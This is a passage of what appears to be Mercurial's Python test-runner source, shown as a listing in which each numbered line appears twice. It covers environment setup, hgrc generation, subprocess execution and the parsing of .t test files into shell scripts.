1253 replacementfile = os.path.join(self._testdir, b'common-pattern.py')
1254
1254
1255 if os.path.exists(replacementfile):
1255 if os.path.exists(replacementfile):
1256 data = {}
1256 data = {}
1257 with open(replacementfile, mode='rb') as source:
1257 with open(replacementfile, mode='rb') as source:
1258 # the intermediate 'compile' step help with debugging
1258 # the intermediate 'compile' step help with debugging
1259 code = compile(source.read(), replacementfile, 'exec')
1259 code = compile(source.read(), replacementfile, 'exec')
1260 exec(code, data)
1260 exec(code, data)
1261 for value in data.get('substitutions', ()):
1261 for value in data.get('substitutions', ()):
1262 if len(value) != 2:
1262 if len(value) != 2:
1263 msg = 'malformatted substitution in %s: %r'
1263 msg = 'malformatted substitution in %s: %r'
1264 msg %= (replacementfile, value)
1264 msg %= (replacementfile, value)
1265 raise ValueError(msg)
1265 raise ValueError(msg)
1266 r.append(value)
1266 r.append(value)
1267 return r
1267 return r
1268
1268
1269 def _escapepath(self, p):
1269 def _escapepath(self, p):
1270 if os.name == 'nt':
1270 if os.name == 'nt':
1271 return b''.join(
1271 return b''.join(
1272 c.isalpha()
1272 c.isalpha()
1273 and b'[%s%s]' % (c.lower(), c.upper())
1273 and b'[%s%s]' % (c.lower(), c.upper())
1274 or c in b'/\\'
1274 or c in b'/\\'
1275 and br'[/\\]'
1275 and br'[/\\]'
1276 or c.isdigit()
1276 or c.isdigit()
1277 and c
1277 and c
1278 or b'\\' + c
1278 or b'\\' + c
1279 for c in [p[i : i + 1] for i in range(len(p))]
1279 for c in [p[i : i + 1] for i in range(len(p))]
1280 )
1280 )
1281 else:
1281 else:
1282 return re.escape(p)
1282 return re.escape(p)
1283
1283
1284 def _localip(self):
1284 def _localip(self):
1285 if self._useipv6:
1285 if self._useipv6:
1286 return b'::1'
1286 return b'::1'
1287 else:
1287 else:
1288 return b'127.0.0.1'
1288 return b'127.0.0.1'
1289
1289
1290 def _genrestoreenv(self, testenv):
1290 def _genrestoreenv(self, testenv):
1291 """Generate a script that can be used by tests to restore the original
1291 """Generate a script that can be used by tests to restore the original
1292 environment."""
1292 environment."""
1293 # Put the restoreenv script inside self._threadtmp
1293 # Put the restoreenv script inside self._threadtmp
1294 scriptpath = os.path.join(self._threadtmp, b'restoreenv.sh')
1294 scriptpath = os.path.join(self._threadtmp, b'restoreenv.sh')
1295 testenv['HGTEST_RESTOREENV'] = _bytes2sys(scriptpath)
1295 testenv['HGTEST_RESTOREENV'] = _bytes2sys(scriptpath)
1296
1296
1297 # Only restore environment variable names that the shell allows
1297 # Only restore environment variable names that the shell allows
1298 # us to export.
1298 # us to export.
1299 name_regex = re.compile('^[a-zA-Z][a-zA-Z0-9_]*$')
1299 name_regex = re.compile('^[a-zA-Z][a-zA-Z0-9_]*$')
1300
1300
1301 # Do not restore these variables; otherwise tests would fail.
1301 # Do not restore these variables; otherwise tests would fail.
1302 reqnames = {'PYTHON', 'TESTDIR', 'TESTTMP'}
1302 reqnames = {'PYTHON', 'TESTDIR', 'TESTTMP'}
1303
1303
1304 with open(scriptpath, 'w') as envf:
1304 with open(scriptpath, 'w') as envf:
1305 for name, value in origenviron.items():
1305 for name, value in origenviron.items():
1306 if not name_regex.match(name):
1306 if not name_regex.match(name):
1307 # Skip environment variables with unusual names not
1307 # Skip environment variables with unusual names not
1308 # allowed by most shells.
1308 # allowed by most shells.
1309 continue
1309 continue
1310 if name in reqnames:
1310 if name in reqnames:
1311 continue
1311 continue
1312 envf.write('%s=%s\n' % (name, shellquote(value)))
1312 envf.write('%s=%s\n' % (name, shellquote(value)))
1313
1313
1314 for name in testenv:
1314 for name in testenv:
1315 if name in origenviron or name in reqnames:
1315 if name in origenviron or name in reqnames:
1316 continue
1316 continue
1317 envf.write('unset %s\n' % (name,))
1317 envf.write('unset %s\n' % (name,))
1318
1318
1319 def _getenv(self):
1319 def _getenv(self):
1320 """Obtain environment variables to use during test execution."""
1320 """Obtain environment variables to use during test execution."""
1321
1321
1322 def defineport(i):
1322 def defineport(i):
1323 offset = '' if i == 0 else '%s' % i
1323 offset = '' if i == 0 else '%s' % i
1324 env["HGPORT%s" % offset] = '%s' % (self._startport + i)
1324 env["HGPORT%s" % offset] = '%s' % (self._startport + i)
1325
1325
1326 env = os.environ.copy()
1326 env = os.environ.copy()
1327 env['PYTHONUSERBASE'] = sysconfig.get_config_var('userbase') or ''
1327 env['PYTHONUSERBASE'] = sysconfig.get_config_var('userbase') or ''
1328 env['HGEMITWARNINGS'] = '1'
1328 env['HGEMITWARNINGS'] = '1'
1329 env['TESTTMP'] = _bytes2sys(self._testtmp)
1329 env['TESTTMP'] = _bytes2sys(self._testtmp)
1330 env['TESTNAME'] = self.name
1330 env['TESTNAME'] = self.name
1331 env['HOME'] = _bytes2sys(self._testtmp)
1331 env['HOME'] = _bytes2sys(self._testtmp)
1332 formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1])
1332 formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1])
1333 env['HGTEST_TIMEOUT_DEFAULT'] = formated_timeout
1333 env['HGTEST_TIMEOUT_DEFAULT'] = formated_timeout
1334 env['HGTEST_TIMEOUT'] = _bytes2sys(b"%d" % self._timeout)
1334 env['HGTEST_TIMEOUT'] = _bytes2sys(b"%d" % self._timeout)
1335 # This number should match portneeded in _getport
1335 # This number should match portneeded in _getport
1336 for port in xrange(3):
1336 for port in xrange(3):
1337 # This list should be parallel to _portmap in _getreplacements
1337 # This list should be parallel to _portmap in _getreplacements
1338 defineport(port)
1338 defineport(port)
1339 env["HGRCPATH"] = _bytes2sys(os.path.join(self._threadtmp, b'.hgrc'))
1339 env["HGRCPATH"] = _bytes2sys(os.path.join(self._threadtmp, b'.hgrc'))
1340 env["DAEMON_PIDS"] = _bytes2sys(
1340 env["DAEMON_PIDS"] = _bytes2sys(
1341 os.path.join(self._threadtmp, b'daemon.pids')
1341 os.path.join(self._threadtmp, b'daemon.pids')
1342 )
1342 )
1343 env["HGEDITOR"] = (
1343 env["HGEDITOR"] = (
1344 '"' + sysexecutable + '"' + ' -c "import sys; sys.exit(0)"'
1344 '"' + sysexecutable + '"' + ' -c "import sys; sys.exit(0)"'
1345 )
1345 )
1346 env["HGUSER"] = "test"
1346 env["HGUSER"] = "test"
1347 env["HGENCODING"] = "ascii"
1347 env["HGENCODING"] = "ascii"
1348 env["HGENCODINGMODE"] = "strict"
1348 env["HGENCODINGMODE"] = "strict"
1349 env["HGHOSTNAME"] = "test-hostname"
1349 env["HGHOSTNAME"] = "test-hostname"
1350 env['HGIPV6'] = str(int(self._useipv6))
1350 env['HGIPV6'] = str(int(self._useipv6))
1351 # See contrib/catapipe.py for how to use this functionality.
1351 # See contrib/catapipe.py for how to use this functionality.
1352 if 'HGTESTCATAPULTSERVERPIPE' not in env:
1352 if 'HGTESTCATAPULTSERVERPIPE' not in env:
1353 # If we don't have HGTESTCATAPULTSERVERPIPE explicitly set, pull the
1353 # If we don't have HGTESTCATAPULTSERVERPIPE explicitly set, pull the
1354 # non-test one in as a default, otherwise set to devnull
1354 # non-test one in as a default, otherwise set to devnull
1355 env['HGTESTCATAPULTSERVERPIPE'] = env.get(
1355 env['HGTESTCATAPULTSERVERPIPE'] = env.get(
1356 'HGCATAPULTSERVERPIPE', os.devnull
1356 'HGCATAPULTSERVERPIPE', os.devnull
1357 )
1357 )
1358
1358
1359 extraextensions = []
1359 extraextensions = []
1360 for opt in self._extraconfigopts:
1360 for opt in self._extraconfigopts:
1361 section, key = _sys2bytes(opt).split(b'.', 1)
1361 section, key = _sys2bytes(opt).split(b'.', 1)
1362 if section != 'extensions':
1362 if section != 'extensions':
1363 continue
1363 continue
1364 name = key.split(b'=', 1)[0]
1364 name = key.split(b'=', 1)[0]
1365 extraextensions.append(name)
1365 extraextensions.append(name)
1366
1366
1367 if extraextensions:
1367 if extraextensions:
1368 env['HGTESTEXTRAEXTENSIONS'] = b' '.join(extraextensions)
1368 env['HGTESTEXTRAEXTENSIONS'] = b' '.join(extraextensions)
1369
1369
1370 # LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
1370 # LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
1371 # IP addresses.
1371 # IP addresses.
1372 env['LOCALIP'] = _bytes2sys(self._localip())
1372 env['LOCALIP'] = _bytes2sys(self._localip())
1373
1373
1374 # This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
1374 # This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
1375 # but this is needed for testing python instances like dummyssh,
1375 # but this is needed for testing python instances like dummyssh,
1376 # dummysmtpd.py, and dumbhttp.py.
1376 # dummysmtpd.py, and dumbhttp.py.
1377 if PYTHON3 and os.name == 'nt':
1377 if PYTHON3 and os.name == 'nt':
1378 env['PYTHONLEGACYWINDOWSSTDIO'] = '1'
1378 env['PYTHONLEGACYWINDOWSSTDIO'] = '1'
1379
1379
1380 # Modified HOME in test environment can confuse Rust tools. So set
1380 # Modified HOME in test environment can confuse Rust tools. So set
1381 # CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
1381 # CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
1382 # present and these variables aren't already defined.
1382 # present and these variables aren't already defined.
1383 cargo_home_path = os.path.expanduser('~/.cargo')
1383 cargo_home_path = os.path.expanduser('~/.cargo')
1384 rustup_home_path = os.path.expanduser('~/.rustup')
1384 rustup_home_path = os.path.expanduser('~/.rustup')
1385
1385
1386 if os.path.exists(cargo_home_path) and b'CARGO_HOME' not in osenvironb:
1386 if os.path.exists(cargo_home_path) and b'CARGO_HOME' not in osenvironb:
1387 env['CARGO_HOME'] = cargo_home_path
1387 env['CARGO_HOME'] = cargo_home_path
1388 if (
1388 if (
1389 os.path.exists(rustup_home_path)
1389 os.path.exists(rustup_home_path)
1390 and b'RUSTUP_HOME' not in osenvironb
1390 and b'RUSTUP_HOME' not in osenvironb
1391 ):
1391 ):
1392 env['RUSTUP_HOME'] = rustup_home_path
1392 env['RUSTUP_HOME'] = rustup_home_path
1393
1393
1394 # Reset some environment variables to well-known values so that
1394 # Reset some environment variables to well-known values so that
1395 # the tests produce repeatable output.
1395 # the tests produce repeatable output.
1396 env['LANG'] = env['LC_ALL'] = env['LANGUAGE'] = 'C'
1396 env['LANG'] = env['LC_ALL'] = env['LANGUAGE'] = 'C'
1397 env['TZ'] = 'GMT'
1397 env['TZ'] = 'GMT'
1398 env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
1398 env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
1399 env['COLUMNS'] = '80'
1399 env['COLUMNS'] = '80'
1400 env['TERM'] = 'xterm'
1400 env['TERM'] = 'xterm'
1401
1401
1402 dropped = [
1402 dropped = [
1403 'CDPATH',
1403 'CDPATH',
1404 'CHGDEBUG',
1404 'CHGDEBUG',
1405 'EDITOR',
1405 'EDITOR',
1406 'GREP_OPTIONS',
1406 'GREP_OPTIONS',
1407 'HG',
1407 'HG',
1408 'HGMERGE',
1408 'HGMERGE',
1409 'HGPLAIN',
1409 'HGPLAIN',
1410 'HGPLAINEXCEPT',
1410 'HGPLAINEXCEPT',
1411 'HGPROF',
1411 'HGPROF',
1412 'http_proxy',
1412 'http_proxy',
1413 'no_proxy',
1413 'no_proxy',
1414 'NO_PROXY',
1414 'NO_PROXY',
1415 'PAGER',
1415 'PAGER',
1416 'VISUAL',
1416 'VISUAL',
1417 ]
1417 ]
1418
1418
1419 for k in dropped:
1419 for k in dropped:
1420 if k in env:
1420 if k in env:
1421 del env[k]
1421 del env[k]
1422
1422
1423 # unset env related to hooks
1423 # unset env related to hooks
1424 for k in list(env):
1424 for k in list(env):
1425 if k.startswith('HG_'):
1425 if k.startswith('HG_'):
1426 del env[k]
1426 del env[k]
1427
1427
1428 if self._usechg:
1428 if self._usechg:
1429 env['CHGSOCKNAME'] = os.path.join(self._chgsockdir, b'server')
1429 env['CHGSOCKNAME'] = os.path.join(self._chgsockdir, b'server')
1430 if self._chgdebug:
1430 if self._chgdebug:
1431 env['CHGDEBUG'] = 'true'
1431 env['CHGDEBUG'] = 'true'
1432
1432
1433 return env
1433 return env
1434
1434
1435 def _createhgrc(self, path):
1435 def _createhgrc(self, path):
1436 """Create an hgrc file for this test."""
1436 """Create an hgrc file for this test."""
1437 with open(path, 'wb') as hgrc:
1437 with open(path, 'wb') as hgrc:
1438 hgrc.write(b'[ui]\n')
1438 hgrc.write(b'[ui]\n')
1439 hgrc.write(b'slash = True\n')
1439 hgrc.write(b'slash = True\n')
1440 hgrc.write(b'interactive = False\n')
1440 hgrc.write(b'interactive = False\n')
1441 hgrc.write(b'merge = internal:merge\n')
1441 hgrc.write(b'merge = internal:merge\n')
1442 hgrc.write(b'mergemarkers = detailed\n')
1442 hgrc.write(b'mergemarkers = detailed\n')
1443 hgrc.write(b'promptecho = True\n')
1443 hgrc.write(b'promptecho = True\n')
1444 hgrc.write(b'[defaults]\n')
1444 hgrc.write(b'[defaults]\n')
1445 hgrc.write(b'[devel]\n')
1445 hgrc.write(b'[devel]\n')
1446 hgrc.write(b'all-warnings = true\n')
1446 hgrc.write(b'all-warnings = true\n')
1447 hgrc.write(b'default-date = 0 0\n')
1447 hgrc.write(b'default-date = 0 0\n')
1448 hgrc.write(b'[largefiles]\n')
1448 hgrc.write(b'[largefiles]\n')
1449 hgrc.write(
1449 hgrc.write(
1450 b'usercache = %s\n'
1450 b'usercache = %s\n'
1451 % (os.path.join(self._testtmp, b'.cache/largefiles'))
1451 % (os.path.join(self._testtmp, b'.cache/largefiles'))
1452 )
1452 )
1453 hgrc.write(b'[lfs]\n')
1453 hgrc.write(b'[lfs]\n')
1454 hgrc.write(
1454 hgrc.write(
1455 b'usercache = %s\n'
1455 b'usercache = %s\n'
1456 % (os.path.join(self._testtmp, b'.cache/lfs'))
1456 % (os.path.join(self._testtmp, b'.cache/lfs'))
1457 )
1457 )
1458 hgrc.write(b'[web]\n')
1458 hgrc.write(b'[web]\n')
1459 hgrc.write(b'address = localhost\n')
1459 hgrc.write(b'address = localhost\n')
1460 hgrc.write(b'ipv6 = %r\n' % self._useipv6)
1460 hgrc.write(b'ipv6 = %r\n' % self._useipv6)
1461 hgrc.write(b'server-header = testing stub value\n')
1461 hgrc.write(b'server-header = testing stub value\n')
1462
1462
1463 for opt in self._extraconfigopts:
1463 for opt in self._extraconfigopts:
1464 section, key = _sys2bytes(opt).split(b'.', 1)
1464 section, key = _sys2bytes(opt).split(b'.', 1)
1465 assert b'=' in key, (
1465 assert b'=' in key, (
1466 'extra config opt %s must ' 'have an = for assignment' % opt
1466 'extra config opt %s must ' 'have an = for assignment' % opt
1467 )
1467 )
1468 hgrc.write(b'[%s]\n%s\n' % (section, key))
1468 hgrc.write(b'[%s]\n%s\n' % (section, key))
1469
1469
1470 def fail(self, msg):
1470 def fail(self, msg):
1471 # unittest differentiates between errored and failed.
1471 # unittest differentiates between errored and failed.
1472 # Failed is denoted by AssertionError (by default at least).
1472 # Failed is denoted by AssertionError (by default at least).
1473 raise AssertionError(msg)
1473 raise AssertionError(msg)
1474
1474
1475 def _runcommand(self, cmd, env, normalizenewlines=False):
1475 def _runcommand(self, cmd, env, normalizenewlines=False):
1476 """Run command in a sub-process, capturing the output (stdout and
1476 """Run command in a sub-process, capturing the output (stdout and
1477 stderr).
1477 stderr).
1478
1478
1479 Return a tuple (exitcode, output). output is None in debug mode.
1479 Return a tuple (exitcode, output). output is None in debug mode.
1480 """
1480 """
1481 if self._debug:
1481 if self._debug:
1482 proc = subprocess.Popen(
1482 proc = subprocess.Popen(
1483 _bytes2sys(cmd),
1483 _bytes2sys(cmd),
1484 shell=True,
1484 shell=True,
1485 cwd=_bytes2sys(self._testtmp),
1485 cwd=_bytes2sys(self._testtmp),
1486 env=env,
1486 env=env,
1487 )
1487 )
1488 ret = proc.wait()
1488 ret = proc.wait()
1489 return (ret, None)
1489 return (ret, None)
1490
1490
1491 proc = Popen4(cmd, self._testtmp, self._timeout, env)
1491 proc = Popen4(cmd, self._testtmp, self._timeout, env)
1492
1492
1493 def cleanup():
1493 def cleanup():
1494 terminate(proc)
1494 terminate(proc)
1495 ret = proc.wait()
1495 ret = proc.wait()
1496 if ret == 0:
1496 if ret == 0:
1497 ret = signal.SIGTERM << 8
1497 ret = signal.SIGTERM << 8
1498 killdaemons(env['DAEMON_PIDS'])
1498 killdaemons(env['DAEMON_PIDS'])
1499 return ret
1499 return ret
1500
1500
1501 proc.tochild.close()
1501 proc.tochild.close()
1502
1502
1503 try:
1503 try:
1504 output = proc.fromchild.read()
1504 output = proc.fromchild.read()
1505 except KeyboardInterrupt:
1505 except KeyboardInterrupt:
1506 vlog('# Handling keyboard interrupt')
1506 vlog('# Handling keyboard interrupt')
1507 cleanup()
1507 cleanup()
1508 raise
1508 raise
1509
1509
1510 ret = proc.wait()
1510 ret = proc.wait()
1511 if wifexited(ret):
1511 if wifexited(ret):
1512 ret = os.WEXITSTATUS(ret)
1512 ret = os.WEXITSTATUS(ret)
1513
1513
1514 if proc.timeout:
1514 if proc.timeout:
1515 ret = 'timeout'
1515 ret = 'timeout'
1516
1516
1517 if ret:
1517 if ret:
1518 killdaemons(env['DAEMON_PIDS'])
1518 killdaemons(env['DAEMON_PIDS'])
1519
1519
1520 for s, r in self._getreplacements():
1520 for s, r in self._getreplacements():
1521 output = re.sub(s, r, output)
1521 output = re.sub(s, r, output)
1522
1522
1523 if normalizenewlines:
1523 if normalizenewlines:
1524 output = output.replace(b'\r\n', b'\n')
1524 output = output.replace(b'\r\n', b'\n')
1525
1525
1526 return ret, output.splitlines(True)
1526 return ret, output.splitlines(True)
1527
1527
1528
1528
1529 class PythonTest(Test):
1529 class PythonTest(Test):
1530 """A Python-based test."""
1530 """A Python-based test."""
1531
1531
1532 @property
1532 @property
1533 def refpath(self):
1533 def refpath(self):
1534 return os.path.join(self._testdir, b'%s.out' % self.bname)
1534 return os.path.join(self._testdir, b'%s.out' % self.bname)
1535
1535
1536 def _run(self, env):
1536 def _run(self, env):
1537 # Quote the python(3) executable for Windows
1537 # Quote the python(3) executable for Windows
1538 cmd = b'"%s" "%s"' % (PYTHON, self.path)
1538 cmd = b'"%s" "%s"' % (PYTHON, self.path)
1539 vlog("# Running", cmd.decode("utf-8"))
1539 vlog("# Running", cmd.decode("utf-8"))
1540 normalizenewlines = os.name == 'nt'
1540 normalizenewlines = os.name == 'nt'
1541 result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
1541 result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
1542 if self._aborted:
1542 if self._aborted:
1543 raise KeyboardInterrupt()
1543 raise KeyboardInterrupt()
1544
1544
1545 return result
1545 return result
1546
1546
1547
1547
1548 # Some glob patterns apply only in some circumstances, so the script
1548 # Some glob patterns apply only in some circumstances, so the script
1549 # might want to remove (glob) annotations that otherwise should be
1549 # might want to remove (glob) annotations that otherwise should be
1550 # retained.
1550 # retained.
1551 checkcodeglobpats = [
1551 checkcodeglobpats = [
1552 # On Windows it looks like \ doesn't require a (glob), but we know
1552 # On Windows it looks like \ doesn't require a (glob), but we know
1553 # better.
1553 # better.
1554 re.compile(br'^pushing to \$TESTTMP/.*[^)]$'),
1554 re.compile(br'^pushing to \$TESTTMP/.*[^)]$'),
1555 re.compile(br'^moving \S+/.*[^)]$'),
1555 re.compile(br'^moving \S+/.*[^)]$'),
1556 re.compile(br'^pulling from \$TESTTMP/.*[^)]$'),
1556 re.compile(br'^pulling from \$TESTTMP/.*[^)]$'),
1557 # Not all platforms have 127.0.0.1 as loopback (though most do),
1557 # Not all platforms have 127.0.0.1 as loopback (though most do),
1558 # so we always glob that too.
1558 # so we always glob that too.
1559 re.compile(br'.*\$LOCALIP.*$'),
1559 re.compile(br'.*\$LOCALIP.*$'),
1560 ]
1560 ]
1561
1561
1562 bchr = chr
1562 bchr = chr
1563 if PYTHON3:
1563 if PYTHON3:
1564 bchr = lambda x: bytes([x])
1564 bchr = lambda x: bytes([x])
1565
1565
1566 WARN_UNDEFINED = 1
1566 WARN_UNDEFINED = 1
1567 WARN_YES = 2
1567 WARN_YES = 2
1568 WARN_NO = 3
1568 WARN_NO = 3
1569
1569
1570 MARK_OPTIONAL = b" (?)\n"
1570 MARK_OPTIONAL = b" (?)\n"
1571
1571
1572
1572
1573 def isoptional(line):
1573 def isoptional(line):
1574 return line.endswith(MARK_OPTIONAL)
1574 return line.endswith(MARK_OPTIONAL)
1575
1575
1576
1576
1577 class TTest(Test):
1577 class TTest(Test):
1578 """A "t test" is a test backed by a .t file."""
1578 """A "t test" is a test backed by a .t file."""
1579
1579
1580 SKIPPED_PREFIX = b'skipped: '
1580 SKIPPED_PREFIX = b'skipped: '
1581 FAILED_PREFIX = b'hghave check failed: '
1581 FAILED_PREFIX = b'hghave check failed: '
1582 NEEDESCAPE = re.compile(br'[\x00-\x08\x0b-\x1f\x7f-\xff]').search
1582 NEEDESCAPE = re.compile(br'[\x00-\x08\x0b-\x1f\x7f-\xff]').search
1583
1583
1584 ESCAPESUB = re.compile(br'[\x00-\x08\x0b-\x1f\\\x7f-\xff]').sub
1584 ESCAPESUB = re.compile(br'[\x00-\x08\x0b-\x1f\\\x7f-\xff]').sub
1585 ESCAPEMAP = {bchr(i): br'\x%02x' % i for i in range(256)}
1585 ESCAPEMAP = {bchr(i): br'\x%02x' % i for i in range(256)}
1586 ESCAPEMAP.update({b'\\': b'\\\\', b'\r': br'\r'})
1586 ESCAPEMAP.update({b'\\': b'\\\\', b'\r': br'\r'})
1587
1587
1588 def __init__(self, path, *args, **kwds):
1588 def __init__(self, path, *args, **kwds):
1589 # accept an extra "case" parameter
1589 # accept an extra "case" parameter
1590 case = kwds.pop('case', [])
1590 case = kwds.pop('case', [])
1591 self._case = case
1591 self._case = case
1592 self._allcases = {x for y in parsettestcases(path) for x in y}
1592 self._allcases = {x for y in parsettestcases(path) for x in y}
1593 super(TTest, self).__init__(path, *args, **kwds)
1593 super(TTest, self).__init__(path, *args, **kwds)
1594 if case:
1594 if case:
1595 casepath = b'#'.join(case)
1595 casepath = b'#'.join(case)
1596 self.name = '%s#%s' % (self.name, _bytes2sys(casepath))
1596 self.name = '%s#%s' % (self.name, _bytes2sys(casepath))
1597 self.errpath = b'%s#%s.err' % (self.errpath[:-4], casepath)
1597 self.errpath = b'%s#%s.err' % (self.errpath[:-4], casepath)
1598 self._tmpname += b'-%s' % casepath
1598 self._tmpname += b'-%s' % casepath
1599 self._have = {}
1599 self._have = {}
1600
1600
1601 @property
1601 @property
1602 def refpath(self):
1602 def refpath(self):
1603 return os.path.join(self._testdir, self.bname)
1603 return os.path.join(self._testdir, self.bname)
1604
1604
1605 def _run(self, env):
1605 def _run(self, env):
1606 with open(self.path, 'rb') as f:
1606 with open(self.path, 'rb') as f:
1607 lines = f.readlines()
1607 lines = f.readlines()
1608
1608
1609 # .t file is both reference output and the test input, keep reference
1609 # .t file is both reference output and the test input, keep reference
1610 # output updated with the the test input. This avoids some race
1610 # output updated with the the test input. This avoids some race
1611 # conditions where the reference output does not match the actual test.
1611 # conditions where the reference output does not match the actual test.
1612 if self._refout is not None:
1612 if self._refout is not None:
1613 self._refout = lines
1613 self._refout = lines
1614
1614
1615 salt, script, after, expected = self._parsetest(lines)
1615 salt, script, after, expected = self._parsetest(lines)
1616
1616
1617 # Write out the generated script.
1617 # Write out the generated script.
1618 fname = b'%s.sh' % self._testtmp
1618 fname = b'%s.sh' % self._testtmp
1619 with open(fname, 'wb') as f:
1619 with open(fname, 'wb') as f:
1620 for l in script:
1620 for l in script:
1621 f.write(l)
1621 f.write(l)
1622
1622
1623 cmd = b'%s "%s"' % (self._shell, fname)
1623 cmd = b'%s "%s"' % (self._shell, fname)
1624 vlog("# Running", cmd.decode("utf-8"))
1624 vlog("# Running", cmd.decode("utf-8"))
1625
1625
1626 exitcode, output = self._runcommand(cmd, env)
1626 exitcode, output = self._runcommand(cmd, env)
1627
1627
1628 if self._aborted:
1628 if self._aborted:
1629 raise KeyboardInterrupt()
1629 raise KeyboardInterrupt()
1630
1630
1631 # Do not merge output if skipped. Return hghave message instead.
1631 # Do not merge output if skipped. Return hghave message instead.
1632 # Similarly, with --debug, output is None.
1632 # Similarly, with --debug, output is None.
1633 if exitcode == self.SKIPPED_STATUS or output is None:
1633 if exitcode == self.SKIPPED_STATUS or output is None:
1634 return exitcode, output
1634 return exitcode, output
1635
1635
1636 return self._processoutput(exitcode, output, salt, after, expected)
1636 return self._processoutput(exitcode, output, salt, after, expected)
1637
1637
1638 def _hghave(self, reqs):
1638 def _hghave(self, reqs):
1639 allreqs = b' '.join(reqs)
1639 allreqs = b' '.join(reqs)
1640
1640
1641 self._detectslow(reqs)
1641 self._detectslow(reqs)
1642
1642
1643 if allreqs in self._have:
1643 if allreqs in self._have:
1644 return self._have.get(allreqs)
1644 return self._have.get(allreqs)
1645
1645
1646 # TODO do something smarter when all other uses of hghave are gone.
1646 # TODO do something smarter when all other uses of hghave are gone.
1647 runtestdir = osenvironb[b'RUNTESTDIR']
1647 runtestdir = osenvironb[b'RUNTESTDIR']
1648 tdir = runtestdir.replace(b'\\', b'/')
1648 tdir = runtestdir.replace(b'\\', b'/')
1649 proc = Popen4(
1649 proc = Popen4(
1650 b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
1650 b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
1651 self._testtmp,
1651 self._testtmp,
1652 0,
1652 0,
1653 self._getenv(),
1653 self._getenv(),
1654 )
1654 )
1655 stdout, stderr = proc.communicate()
1655 stdout, stderr = proc.communicate()
1656 ret = proc.wait()
1656 ret = proc.wait()
1657 if wifexited(ret):
1657 if wifexited(ret):
1658 ret = os.WEXITSTATUS(ret)
1658 ret = os.WEXITSTATUS(ret)
1659 if ret == 2:
1659 if ret == 2:
1660 print(stdout.decode('utf-8'))
1660 print(stdout.decode('utf-8'))
1661 sys.exit(1)
1661 sys.exit(1)
1662
1662
1663 if ret != 0:
1663 if ret != 0:
1664 self._have[allreqs] = (False, stdout)
1664 self._have[allreqs] = (False, stdout)
1665 return False, stdout
1665 return False, stdout
1666
1666
1667 self._have[allreqs] = (True, None)
1667 self._have[allreqs] = (True, None)
1668 return True, None
1668 return True, None
1669
1669
1670 def _detectslow(self, reqs):
1670 def _detectslow(self, reqs):
1671 """update the timeout of slow test when appropriate"""
1671 """update the timeout of slow test when appropriate"""
1672 if b'slow' in reqs:
1672 if b'slow' in reqs:
1673 self._timeout = self._slowtimeout
1673 self._timeout = self._slowtimeout
1674
1674
1675 def _iftest(self, args):
1675 def _iftest(self, args):
1676 # implements "#if"
1676 # implements "#if"
1677 reqs = []
1677 reqs = []
1678 for arg in args:
1678 for arg in args:
1679 if arg.startswith(b'no-') and arg[3:] in self._allcases:
1679 if arg.startswith(b'no-') and arg[3:] in self._allcases:
1680 if arg[3:] in self._case:
1680 if arg[3:] in self._case:
1681 return False
1681 return False
1682 elif arg in self._allcases:
1682 elif arg in self._allcases:
1683 if arg not in self._case:
1683 if arg not in self._case:
1684 return False
1684 return False
1685 else:
1685 else:
1686 reqs.append(arg)
1686 reqs.append(arg)
1687 self._detectslow(reqs)
1687 self._detectslow(reqs)
1688 return self._hghave(reqs)[0]
1688 return self._hghave(reqs)[0]
1689
1689
1690 def _parsetest(self, lines):
1690 def _parsetest(self, lines):
1691 # We generate a shell script which outputs unique markers to line
1691 # We generate a shell script which outputs unique markers to line
1692 # up script results with our source. These markers include input
1692 # up script results with our source. These markers include input
1693 # line number and the last return code.
1693 # line number and the last return code.
1694 salt = b"SALT%d" % time.time()
1694 salt = b"SALT%d" % time.time()
1695
1695
1696 def addsalt(line, inpython):
1696 def addsalt(line, inpython):
1697 if inpython:
1697 if inpython:
1698 script.append(b'%s %d 0\n' % (salt, line))
1698 script.append(b'%s %d 0\n' % (salt, line))
1699 else:
1699 else:
1700 script.append(b'echo %s %d $?\n' % (salt, line))
1700 script.append(b'echo %s %d $?\n' % (salt, line))
1701
1701
1702 activetrace = []
1702 activetrace = []
1703 session = str(uuid.uuid4())
1703 session = str(uuid.uuid4())
1704 if PYTHON3:
1704 if PYTHON3:
1705 session = session.encode('ascii')
1705 session = session.encode('ascii')
1706 hgcatapult = os.getenv('HGTESTCATAPULTSERVERPIPE') or os.getenv(
1706 hgcatapult = os.getenv('HGTESTCATAPULTSERVERPIPE') or os.getenv(
1707 'HGCATAPULTSERVERPIPE'
1707 'HGCATAPULTSERVERPIPE'
1708 )
1708 )
1709
1709
1710 def toggletrace(cmd=None):
1710 def toggletrace(cmd=None):
1711 if not hgcatapult or hgcatapult == os.devnull:
1711 if not hgcatapult or hgcatapult == os.devnull:
1712 return
1712 return
1713
1713
1714 if activetrace:
1714 if activetrace:
1715 script.append(
1715 script.append(
1716 b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1716 b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1717 % (session, activetrace[0])
1717 % (session, activetrace[0])
1718 )
1718 )
1719 if cmd is None:
1719 if cmd is None:
1720 return
1720 return
1721
1721
1722 if isinstance(cmd, str):
1722 if isinstance(cmd, str):
1723 quoted = shellquote(cmd.strip())
1723 quoted = shellquote(cmd.strip())
1724 else:
1724 else:
1725 quoted = shellquote(cmd.strip().decode('utf8')).encode('utf8')
1725 quoted = shellquote(cmd.strip().decode('utf8')).encode('utf8')
1726 quoted = quoted.replace(b'\\', b'\\\\')
1726 quoted = quoted.replace(b'\\', b'\\\\')
1727 script.append(
1727 script.append(
1728 b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1728 b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1729 % (session, quoted)
1729 % (session, quoted)
